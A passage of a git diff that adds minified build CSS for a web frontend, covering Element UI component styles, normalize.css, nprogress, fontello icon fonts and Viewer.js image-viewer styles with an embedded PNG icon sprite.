ease-out}.el-scrollbar__wrap{overflow:scroll;height:100%}.el-scrollbar__wrap--hidden-default{scrollbar-width:none}.el-scrollbar__wrap--hidden-default::-webkit-scrollbar{width:0;height:0}.el-scrollbar__thumb{position:relative;display:block;width:0;height:0;cursor:pointer;border-radius:inherit;background-color:rgba(144,147,153,.3);-webkit-transition:background-color .3s;transition:background-color .3s}.el-scrollbar__thumb:hover{background-color:rgba(144,147,153,.5)}.el-scrollbar__bar{position:absolute;right:2px;bottom:2px;z-index:1;border-radius:4px;opacity:0;-webkit-transition:opacity .12s ease-out;transition:opacity .12s ease-out}.el-scrollbar__bar.is-vertical{width:6px;top:2px}.el-scrollbar__bar.is-vertical>div{width:100%}.el-scrollbar__bar.is-horizontal{height:6px;left:2px}.el-scrollbar__bar.is-horizontal>div{height:100%}.el-cascader-panel{display:-webkit-box;display:-ms-flexbox;display:flex;border-radius:4px}.el-cascader-panel.is-bordered{border:1px solid #e4e7ed;border-radius:4px}.el-cascader-menu{min-width:180px;-webkit-box-sizing:border-box;box-sizing:border-box;color:#606266;border-right:1px solid #e4e7ed}.el-cascader-menu:last-child{border-right:none}.el-cascader-menu__wrap{height:204px}.el-cascader-menu__list{position:relative;min-height:100%;margin:0;padding:6px 0;list-style:none;-webkit-box-sizing:border-box;box-sizing:border-box}.el-cascader-menu__hover-zone{position:absolute;top:0;left:0;width:100%;height:100%;pointer-events:none}.el-cascader-menu__empty-text{position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);text-align:center;color:#c0c4cc}.el-cascader-node{position:relative;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:0 30px 0 20px;height:34px;line-height:34px;outline:0}.el-cascader-node.is-selectable.in-active-path{color:#606266}.el-cascader-node.in-active-path,.el-cascader-node.is-active,.el-cascader-node.is-selectable.in-checked-path{color:#409eff;font-weight:700}.el-cascader-node:not(.is-disabled){cursor:pointer}.el-cascader-node:not(.is-disabled):focus,.el-cascader-node:not(.is-disabled):hover{background:#f5f7fa}.el-cascader-node.is-disabled{color:#c0c4cc;cursor:not-allowed}.el-cascader-node__prefix{position:absolute;left:10px}.el-cascader-node__postfix{position:absolute;right:10px}.el-cascader-node__label{-webkit-box-flex:1;-ms-flex:1;flex:1;padding:0 10px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.el-cascader-node>.el-radio .el-radio__label{padding-left:0}.el-avatar{display:inline-block;box-sizing:border-box;text-align:center;overflow:hidden;color:#fff;background:#c0c4cc;width:40px;height:40px;line-height:40px}.el-avatar,.el-drawer,.el-drawer__body>*{-webkit-box-sizing:border-box}.el-avatar>img{display:block;height:100%;vertical-align:middle}.el-empty__image img,.el-empty__image svg{vertical-align:top;height:100%;width:100%}.el-avatar--circle{border-radius:50%}.el-avatar--square{border-radius:4px}.el-avatar--icon{font-size:18px}.el-avatar--large{width:40px;height:40px;line-height:40px}.el-avatar--medium{width:36px;height:36px;line-height:36px}.el-avatar--small{width:28px;height:28px;line-height:28px}@-webkit-keyframes el-drawer-fade-in{0%{opacity:0}to{opacity:1}}@keyframes el-drawer-fade-in{0%{opacity:0}to{opacity:1}}@-webkit-keyframes rtl-drawer-in{0%{-webkit-transform:translate(100%);transform:translate(100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@keyframes rtl-drawer-in{0%{-webkit-transform:translate(100%);transform:translate(100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@-webkit-keyframes rtl-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translate(100%);transform:translate(100%)}}@keyframes rtl-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translate(100%);transform:translate(100%)}}@-webkit-keyframes ltr-drawer-in{0%{-webkit-transform:translate(-100%);transform:translate(-100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@keyframes ltr-drawer-in{0%{-webkit-transform:translate(-100%);transform:translate(-100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@-webkit-keyframes ltr-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translate(-100%);transform:translate(-100%)}}@keyframes ltr-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translate(-100%);transform:translate(-100%)}}@-webkit-keyframes ttb-drawer-in{0%{-webkit-transform:translateY(-100%);transform:translateY(-100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@keyframes ttb-drawer-in{0%{-webkit-transform:translateY(-100%);transform:translateY(-100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@-webkit-keyframes ttb-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translateY(-100%);transform:translateY(-100%)}}@keyframes ttb-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translateY(-100%);transform:translateY(-100%)}}@-webkit-keyframes btt-drawer-in{0%{-webkit-transform:translateY(100%);transform:translateY(100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@keyframes btt-drawer-in{0%{-webkit-transform:translateY(100%);transform:translateY(100%)}to{-webkit-transform:translate(0);transform:translate(0)}}@-webkit-keyframes btt-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translateY(100%);transform:translateY(100%)}}@keyframes btt-drawer-out{0%{-webkit-transform:translate(0);transform:translate(0)}to{-webkit-transform:translateY(100%);transform:translateY(100%)}}.el-drawer{position:absolute;-webkit-box-sizing:border-box;box-sizing:border-box;background-color:#fff;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-direction:column;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column;-webkit-box-shadow:0 8px 10px -5px rgba(0,0,0,.2),0 16px 24px 2px rgba(0,0,0,.14),0 6px 30px 5px rgba(0,0,0,.12);box-shadow:0 8px 10px -5px rgba(0,0,0,.2),0 16px 24px 2px rgba(0,0,0,.14),0 6px 30px 5px rgba(0,0,0,.12);overflow:hidden;outline:0}.el-drawer.rtl{-webkit-animation:rtl-drawer-out .3s;animation:rtl-drawer-out .3s;right:0}.el-drawer__open .el-drawer.rtl{-webkit-animation:rtl-drawer-in .3s 1ms;animation:rtl-drawer-in .3s 1ms}.el-drawer.ltr{-webkit-animation:ltr-drawer-out .3s;animation:ltr-drawer-out .3s;left:0}.el-drawer__open .el-drawer.ltr{-webkit-animation:ltr-drawer-in .3s 1ms;animation:ltr-drawer-in .3s 1ms}.el-drawer.ttb{-webkit-animation:ttb-drawer-out .3s;animation:ttb-drawer-out .3s;top:0}.el-drawer__open .el-drawer.ttb{-webkit-animation:ttb-drawer-in .3s 1ms;animation:ttb-drawer-in .3s 1ms}.el-drawer.btt{-webkit-animation:btt-drawer-out .3s;animation:btt-drawer-out .3s;bottom:0}.el-drawer__open .el-drawer.btt{-webkit-animation:btt-drawer-in .3s 1ms;animation:btt-drawer-in .3s 1ms}.el-drawer__wrapper{position:fixed;top:0;right:0;bottom:0;left:0;overflow:hidden;margin:0}.el-drawer__header{-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#72767b;display:-webkit-box;display:-ms-flexbox;display:flex;margin-bottom:32px;padding:20px 20px 0}.el-drawer__header>:first-child,.el-drawer__title{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-drawer__title{margin:0;line-height:inherit;font-size:1rem}.el-drawer__close-btn{border:none;cursor:pointer;font-size:20px;color:inherit;background-color:transparent}.el-drawer__body{-webkit-box-flex:1;-ms-flex:1;flex:1;overflow:auto}.el-popconfirm__main,.el-skeleton__image{display:-ms-flexbox;-webkit-box-align:center;display:-webkit-box}.el-drawer__body>*{-webkit-box-sizing:border-box;box-sizing:border-box}.el-drawer.ltr,.el-drawer.rtl{height:100%;top:0;bottom:0}.el-drawer.btt,.el-drawer.ttb,.el-drawer__container{width:100%;left:0;right:0}.el-drawer__container{position:relative;top:0;bottom:0;height:100%}.el-drawer-fade-enter-active{-webkit-animation:el-drawer-fade-in .3s;animation:el-drawer-fade-in .3s}.el-drawer-fade-leave-active{animation:el-drawer-fade-in .3s reverse}.el-popconfirm__main{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-webkit-box-align:center;align-items:center}.el-popconfirm__icon{margin-right:5px}.el-popconfirm__action{text-align:right;margin:0}@-webkit-keyframes el-skeleton-loading{0%{background-position:100% 50%}to{background-position:0 50%}}@keyframes el-skeleton-loading{0%{background-position:100% 50%}to{background-position:0 50%}}.el-skeleton{width:100%}.el-skeleton__first-line,.el-skeleton__paragraph{height:16px;margin-top:16px;background:#f2f2f2}.el-skeleton.is-animated .el-skeleton__item{background:-webkit-gradient(linear,left top,right top,color-stop(25%,#f2f2f2),color-stop(37%,#e6e6e6),color-stop(63%,#f2f2f2));background:linear-gradient(90deg,#f2f2f2 25%,#e6e6e6 37%,#f2f2f2 63%);background-size:400% 100%;-webkit-animation:el-skeleton-loading 1.4s ease infinite;animation:el-skeleton-loading 1.4s ease infinite}.el-skeleton__item{background:#f2f2f2;display:inline-block;height:16px;border-radius:4px;width:100%}.el-skeleton__circle{border-radius:50%;width:36px;height:36px;line-height:36px}.el-skeleton__circle--lg{width:40px;height:40px;line-height:40px}.el-skeleton__circle--md{width:28px;height:28px;line-height:28px}.el-skeleton__button{height:40px;width:64px;border-radius:4px}.el-skeleton__p{width:100%}.el-skeleton__p.is-last{width:61%}.el-skeleton__p.is-first{width:33%}.el-skeleton__text{width:100%;height:13px}.el-skeleton__caption{height:12px}.el-skeleton__h1{height:20px}.el-skeleton__h3{height:18px}.el-skeleton__h5{height:16px}.el-skeleton__image{width:unset;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-webkit-box-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;border-radius:0}.el-skeleton__image svg{fill:#dcdde0;width:22%;height:22%}.el-empty{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-ms-flex-direction:column;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column;text-align:center;-webkit-box-sizing:border-box;box-sizing:border-box;padding:40px 0}.el-empty__image{width:160px}.el-empty__image img{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-o-object-fit:contain;object-fit:contain}.el-empty__image svg{fill:#dcdde0}.el-empty__description{margin-top:20px}.el-empty__description p{margin:0;font-size:14px;color:#909399}.el-empty__bottom,.el-result__title{margin-top:20px}.el-descriptions{-webkit-box-sizing:border-box;box-sizing:border-box;font-size:14px;color:#303133}.el-descriptions__header{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;-webkit-box-align:center;-ms-flex-align:center;align-items:center;margin-bottom:20px}.el-descriptions__title{font-size:16px;font-weight:700}.el-descriptions--mini,.el-descriptions--small{font-size:12px}.el-descriptions__body{color:#606266;background-color:#fff}.el-descriptions__body .el-descriptions__table{border-collapse:collapse;width:100%;table-layout:fixed}.el-descriptions__body .el-descriptions__table .el-descriptions-item__cell{-webkit-box-sizing:border-box;box-sizing:border-box;text-align:left;font-weight:400;line-height:1.5}.el-descriptions__body .el-descriptions__table .el-descriptions-item__cell.is-left{text-align:left}.el-descriptions__body .el-descriptions__table .el-descriptions-item__cell.is-center{text-align:center}.el-descriptions__body .el-descriptions__table .el-descriptions-item__cell.is-right{text-align:right}.el-descriptions .is-bordered{table-layout:auto}.el-descriptions .is-bordered .el-descriptions-item__cell{border:1px solid #ebeef5;padding:12px 10px}.el-descriptions :not(.is-bordered) .el-descriptions-item__cell{padding-bottom:12px}.el-descriptions--medium.is-bordered .el-descriptions-item__cell{padding:10px}.el-descriptions--medium:not(.is-bordered) .el-descriptions-item__cell{padding-bottom:10px}.el-descriptions--small.is-bordered .el-descriptions-item__cell{padding:8px 10px}.el-descriptions--small:not(.is-bordered) .el-descriptions-item__cell{padding-bottom:8px}.el-descriptions--mini.is-bordered .el-descriptions-item__cell{padding:6px 10px}.el-descriptions--mini:not(.is-bordered) .el-descriptions-item__cell{padding-bottom:6px}.el-descriptions-item{vertical-align:top}.el-descriptions-item__container{display:-webkit-box;display:-ms-flexbox;display:flex}.el-descriptions-item__container .el-descriptions-item__content,.el-descriptions-item__container .el-descriptions-item__label{display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-align:baseline;-ms-flex-align:baseline;align-items:baseline}.el-descriptions-item__container .el-descriptions-item__content{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-descriptions-item__label.has-colon:after{content:":";position:relative;top:-.5px}.el-descriptions-item__label.is-bordered-label{font-weight:700;color:#909399;background:#fafafa}.el-descriptions-item__label:not(.is-bordered-label){margin-right:10px}.el-descriptions-item__content{word-break:break-word;overflow-wrap:break-word}.el-result{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-ms-flex-direction:column;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column;text-align:center;-webkit-box-sizing:border-box;box-sizing:border-box;padding:40px 30px}.el-result__icon svg{width:64px;height:64px}.el-result__title p{margin:0;font-size:20px;color:#303133;line-height:1.3}.el-result__subtitle{margin-top:10px}.el-result__subtitle p{margin:0;font-size:14px;color:#606266;line-height:1.3}.el-result__extra{margin-top:30px}.el-result .icon-success{fill:#67c23a}.el-result .icon-error{fill:#f56c6c}.el-result .icon-info{fill:#909399}.el-result .icon-warning{fill:#e6a23c} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-f4ab59c0.75b29889.css b/frontend/dist/static/css/chunk-f4ab59c0.75b29889.css new file mode 100644 index 0000000..9c40028 --- /dev/null +++ b/frontend/dist/static/css/chunk-f4ab59c0.75b29889.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.header[data-v-32cdd5de]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:8px 20px;border-bottom:1px solid #eee;border-top:1px solid #eee;color:#515b78}.header-rigth[data-v-32cdd5de]{display:-webkit-box;display:-ms-flexbox;display:flex;font-size:14px}.header-rigth-text[data-v-32cdd5de]{margin-left:20px;cursor:pointer}.header-rigth-text[data-v-32cdd5de]:hover{color:#2684ff}.content[data-v-32cdd5de]{max-width:1440px;width:100%;padding:20px 40px;margin-left:auto;margin-right:auto}.content-title[data-v-32cdd5de]{color:#181818;font-size:28px;height:48px;line-height:48px;margin-left:60px}.content-desc[data-v-32cdd5de]{font-size:20px;height:32px;line-height:32px;margin-left:60px;color:#181818}.website-svg[data-v-32cdd5de]{font-size:60px}.card-top[data-v-32cdd5de]{display:-webkit-box;display:-ms-flexbox;display:flex;padding:10px 20px}.card-desc[data-v-32cdd5de]{margin-left:20px}.card-name[data-v-32cdd5de]{font-size:20px;font-weight:700;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;height:42px}.card-host[data-v-32cdd5de]{color:#000}.card-time[data-v-32cdd5de]{width:100%;text-align:center;font-size:14px;color:#999;margin-top:30px}.theme-card[data-v-32cdd5de]{display:inline-block;height:150px;height:16vw;max-height:230px;-webkit-box-flex:0;-ms-flex:0 0 24%;flex:0 0 24%;cursor:default;vertical-align:bottom}.barlogo[data-v-32cdd5de]{width:32px;height:32px;vertical-align:middle;margin-right:15px;padding-top:-1px;margin-top:-3px}.wendang[data-v-32cdd5de]{font-size:15px;color:#3f3e3e;margin-right:40px;margin-bottom:-50px}.users[data-v-32cdd5de]{padding-top:10px}.users[data-v-32cdd5de],.yuantun[data-v-32cdd5de]{width:50px;height:50px;margin-top:20px}.navbox[data-v-32cdd5de]{width:100%;height:100px;background:#ccc;margin-top:-25px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;line-height:100px}.headers[data-v-32cdd5de]{margin-left:150px;margin-top:50px}.row[data-v-32cdd5de]{margin-left:70px}.clear[data-v-32cdd5de]{clear:both}.xg[data-v-32cdd5de]{margin-left:400px;margin-top:50px}.h[data-v-32cdd5de]{line-height:25px}.select[data-v-32cdd5de]{width:270px;height:180px;border:1px solid red;border-radius:8px;margin:10px;text-align:center}.card_t[data-v-32cdd5de]{line-height:180px;text-align:center;color:#c1c2c2;font-size:14px}.box-card[data-v-32cdd5de],.card_t[data-v-32cdd5de]{width:270px;height:180px;float:left;margin-top:30px;margin-left:60px}.box-card[data-v-32cdd5de]{cursor:pointer;position:relative}.box-card .action[data-v-32cdd5de]{position:absolute;bottom:-60px;left:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;width:100%;height:60px;line-height:60px;background:hsla(0,0%,100%,.7);border-top:1px solid #f5f8fb}.box-card .detele[data-v-32cdd5de]{width:50%;text-align:center;color:red}.box-card .change[data-v-32cdd5de]{width:50%;text-align:center;color:#00f}.box-card[data-v-32cdd5de]:hover{-webkit-transform:translateY(-10px);transform:translateY(-10px)}.box-card:hover .action[data-v-32cdd5de]{bottom:0}.yhbox[data-v-32cdd5de]{font-size:30px;font-weight:700;padding-top:100px;margin-left:200px}.yhc[data-v-32cdd5de]{font-size:25px;margin-left:200px}.cards[data-v-32cdd5de]{margin:0 auto}.checkall[data-v-32cdd5de]{float:left}.checkone[data-v-32cdd5de]{float:left;margin-left:20px}.el-drawer__body[data-v-32cdd5de]{padding:20px}.demo-drawer__content[data-v-32cdd5de]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-32cdd5de]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-32cdd5de]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button[data-v-32cdd5de]{-webkit-box-flex:1;-ms-flex:1;flex:1} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-libs.03396be5.css b/frontend/dist/static/css/chunk-libs.03396be5.css new file mode 100644 index 0000000..1214d3d --- /dev/null +++ b/frontend/dist/static/css/chunk-libs.03396be5.css @@ -0,0 +1,10 @@ +/*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:inherit;font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{-webkit-box-sizing:border-box;box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{display:inline-block;vertical-align:baseline}textarea{overflow:auto}[type=checkbox],[type=radio]{-webkit-box-sizing:border-box;box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-cancel-button,[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}[hidden],template{display:none}#nprogress{pointer-events:none}#nprogress .bar{background:#29d;position:fixed;z-index:1031;top:0;left:0;width:100%;height:2px}#nprogress .peg{display:block;position:absolute;right:0;width:100px;height:100%;-webkit-box-shadow:0 0 10px #29d,0 0 5px #29d;box-shadow:0 0 10px #29d,0 0 5px #29d;opacity:1;-webkit-transform:rotate(3deg) translateY(-4px);transform:rotate(3deg) translateY(-4px)}#nprogress .spinner{display:block;position:fixed;z-index:1031;top:15px;right:15px}#nprogress .spinner-icon{width:18px;height:18px;-webkit-box-sizing:border-box;box-sizing:border-box;border:2px solid transparent;border-top-color:#29d;border-left-color:#29d;border-radius:50%;-webkit-animation:nprogress-spinner .4s linear infinite;animation:nprogress-spinner .4s linear infinite}.nprogress-custom-parent{overflow:hidden;position:relative}.nprogress-custom-parent #nprogress .bar,.nprogress-custom-parent #nprogress .spinner{position:absolute}@-webkit-keyframes nprogress-spinner{0%{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(1turn)}}@keyframes nprogress-spinner{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@font-face{font-family:fontello;src:url(../../static/fonts/fontello.e73a0647.eot);src:url(../../static/fonts/fontello.e73a0647.eot#iefix) format("embedded-opentype"),url(../../static/fonts/fontello.8d4a4e6f.woff2) format("woff2"),url(../../static/fonts/fontello.a782baa8.woff) format("woff"),url(../../static/fonts/fontello.068ca2b3.ttf) format("truetype"),url(../../static/img/fontello.9354499c.svg#fontello) format("svg");font-weight:400;font-style:normal}[class*=" fa-mavon-"]:before,[class^=fa-mavon-]:before{font-family:fontello;font-style:normal;font-weight:400;speak:none;display:inline-block;text-decoration:inherit;width:1em;margin-right:.2em;text-align:center;font-variant:normal;text-transform:none;line-height:1em;margin-left:.2em;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-mavon-bold:before{content:"\E800"}.fa-mavon-italic:before{content:"\E801"}.fa-mavon-thumb-tack:before{content:"\E802"}.fa-mavon-link:before{content:"\E803"}.fa-mavon-picture-o:before{content:"\E804"}.fa-mavon-repeat:before{content:"\E805"}.fa-mavon-undo:before{content:"\E806"}.fa-mavon-trash-o:before{content:"\E807"}.fa-mavon-floppy-o:before{content:"\E808"}.fa-mavon-compress:before{content:"\E809"}.fa-mavon-eye:before{content:"\E80A"}.fa-mavon-eye-slash:before{content:"\E80B"}.fa-mavon-question-circle:before{content:"\E80C"}.fa-mavon-times:before{content:"\E80D"}.fa-mavon-align-left:before{content:"\E80F"}.fa-mavon-align-center:before{content:"\E810"}.fa-mavon-align-right:before{content:"\E811"}.fa-mavon-arrows-alt:before{content:"\F0B2"}.fa-mavon-bars:before{content:"\F0C9"}.fa-mavon-list-ul:before{content:"\F0CA"}.fa-mavon-list-ol:before{content:"\F0CB"}.fa-mavon-strikethrough:before{content:"\F0CC"}.fa-mavon-underline:before{content:"\F0CD"}.fa-mavon-table:before{content:"\F0CE"}.fa-mavon-columns:before{content:"\F0DB"}.fa-mavon-quote-left:before{content:"\F10D"}.fa-mavon-code:before{content:"\F121"}.fa-mavon-superscript:before{content:"\F12B"}.fa-mavon-subscript:before{content:"\F12C"}.fa-mavon-header:before{content:"\F1DC"}.fa-mavon-window-maximize:before{content:"\F2D0"}.markdown-body strong{font-weight:bolder}.markdown-body .hljs-center{text-align:center}.markdown-body .hljs-right{text-align:right}.markdown-body .hljs-left{text-align:left}.markdown-body .hljs{overflow:auto} +/*! + * Viewer.js v1.10.5 + * https://fengyuanchen.github.io/viewerjs + * + * Copyright 2015-present Chen Fengyuan + * Released under the MIT license + * + * Date: 2022-04-05T08:21:00.150Z + */.viewer-close:before,.viewer-flip-horizontal:before,.viewer-flip-vertical:before,.viewer-fullscreen-exit:before,.viewer-fullscreen:before,.viewer-next:before,.viewer-one-to-one:before,.viewer-play:before,.viewer-prev:before,.viewer-reset:before,.viewer-rotate-left:before,.viewer-rotate-right:before,.viewer-zoom-in:before,.viewer-zoom-out:before{background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARgAAAAUCAYAAABWOyJDAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAQPSURBVHic7Zs/iFxVFMa/0U2UaJGksUgnIVhYxVhpjDbZCBmLdAYECxsRFBTUamcXUiSNncgKQbSxsxH8gzAP3FU2jY0kKKJNiiiIghFlccnP4p3nPCdv3p9778vsLOcHB2bfveeb7955c3jvvNkBIMdxnD64a94GHMfZu3iBcRynN7zAOI7TG15gHCeeNUkr8zaxG2lbYDYsdgMbktBsP03jdQwljSXdtBhLOmtjowC9Mg9L+knSlcD8TNKpSA9lBpK2JF2VdDSR5n5J64m0qli399hNFMUlpshQii5jbXTbHGviB0nLNeNDSd9VO4A2UdB2fp+x0eCnaXxWXGA2X0au/3HgN9P4LFCjIANOJdrLr0zzZ+BEpNYDwKbpnQMeAw4m8HjQtM6Z9qa917zPQwFr3M5KgA6J5rTJCdFZJj9/lyvGhsDvwFNVuV2MhhjrK6b9bFiE+j1r87eBl4HDwCF7/U/k+ofAX5b/EXBv5JoLMuILzf3Ap6Z3EzgdqHMCuF7hcQf4HDgeoHnccncqdK/TvSDWffFXI/exICY/xZyqc6XLWF1UFZna4gJ7q8BsRvgd2/xXpo6P+D9dfT7PpECtA3cnWPM0GXGFZh/wgWltA+cDNC7X+AP4GzjZQe+k5dRxuYPeiuXU7e1qwLpDz7dFjXKRaSwuMLvAlG8zZlG+YmiK1HoFqT7wP2z+4Q45TfEGcMt01xLoNZEBTwRqD4BLpnMLeC1A41UmVxsXgXeBayV/Wx20rpTyrpnWRft7p6O/FdqzGrDukPNtkaMoMo3FBdBSQMOnYBCReyf05s126fU9ytfX98+mY54Kxnp7S9K3kj6U9KYdG0h6UdLbkh7poFXMfUnSOyVvL0h6VtIXHbS6nOP+s/Zm9mvyXW1uuC9ohZ72E9uDmXWLJOB1GxsH+DxPftsB8B6wlGDN02TAkxG6+4D3TWsbeC5CS8CDFce+AW500LhhOW2020TRjK3b21HEmgti9m0RonxbdMZeVzV+/4tF3cBpP7E9mKHNL5q8h5g0eYsCMQz0epq8gQrwMXAgcs0FGXGFRcB9wCemF9PkbYqM/Bas7fxLwNeJPdTdpo4itQti8lPMqTpXuozVRVXPpbHI3KkNTB1NfkL81j2mvhDp91HgV9MKuRIqrykj3WPq4rHyL+axj8/qGPmTqi6F9YDlHOvJU6oYcTsh/TYSzWmTE6JT19CtLTJt32D6CmHe0eQn1O8z5AXgT4sx4Vcu0/EQecMydB8z0hUWkTd2t4CrwNEePqMBcAR4mrBbwyXLPWJa8zrXmmLEhNBmfpkuY2102xxrih+pb+ieAb6vGhuA97UcJ5KR8gZ77K+99xxeYBzH6Q3/Z0fHcXrDC4zjOL3hBcZxnN74F+zlvXFWXF9PAAAAAElFTkSuQmCC");background-repeat:no-repeat;background-size:280px;color:transparent;display:block;font-size:0;height:20px;line-height:0;width:20px}.viewer-zoom-in:before{background-position:0 0;content:"Zoom In"}.viewer-zoom-out:before{background-position:-20px 0;content:"Zoom Out"}.viewer-one-to-one:before{background-position:-40px 0;content:"One to One"}.viewer-reset:before{background-position:-60px 0;content:"Reset"}.viewer-prev:before{background-position:-80px 0;content:"Previous"}.viewer-play:before{background-position:-100px 0;content:"Play"}.viewer-next:before{background-position:-120px 0;content:"Next"}.viewer-rotate-left:before{background-position:-140px 0;content:"Rotate Left"}.viewer-rotate-right:before{background-position:-160px 0;content:"Rotate Right"}.viewer-flip-horizontal:before{background-position:-180px 0;content:"Flip Horizontal"}.viewer-flip-vertical:before{background-position:-200px 0;content:"Flip Vertical"}.viewer-fullscreen:before{background-position:-220px 0;content:"Enter Full Screen"}.viewer-fullscreen-exit:before{background-position:-240px 0;content:"Exit Full Screen"}.viewer-close:before{background-position:-260px 0;content:"Close"}.viewer-container{bottom:0;direction:ltr;font-size:0;left:0;line-height:0;overflow:hidden;position:absolute;right:0;-webkit-tap-highlight-color:transparent;top:0;-ms-touch-action:none;touch-action:none;-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.viewer-container::-moz-selection,.viewer-container ::-moz-selection{background-color:transparent}.viewer-container::selection,.viewer-container ::selection{background-color:transparent}.viewer-container:focus{outline:0}.viewer-container img{display:block;height:auto;max-height:none!important;max-width:none!important;min-height:0!important;min-width:0!important;width:100%}.viewer-canvas{bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}.viewer-canvas>img{height:auto;margin:15px auto;max-width:90%!important;width:auto}.viewer-footer{bottom:0;left:0;overflow:hidden;position:absolute;right:0;text-align:center}.viewer-navbar{background-color:rgba(0,0,0,.5);overflow:hidden}.viewer-list{-webkit-box-sizing:content-box;box-sizing:content-box;height:50px;margin:0;overflow:hidden;padding:1px 0}.viewer-list>li{color:transparent;cursor:pointer;float:left;font-size:0;height:50px;line-height:0;opacity:.5;overflow:hidden;-webkit-transition:opacity .15s;transition:opacity 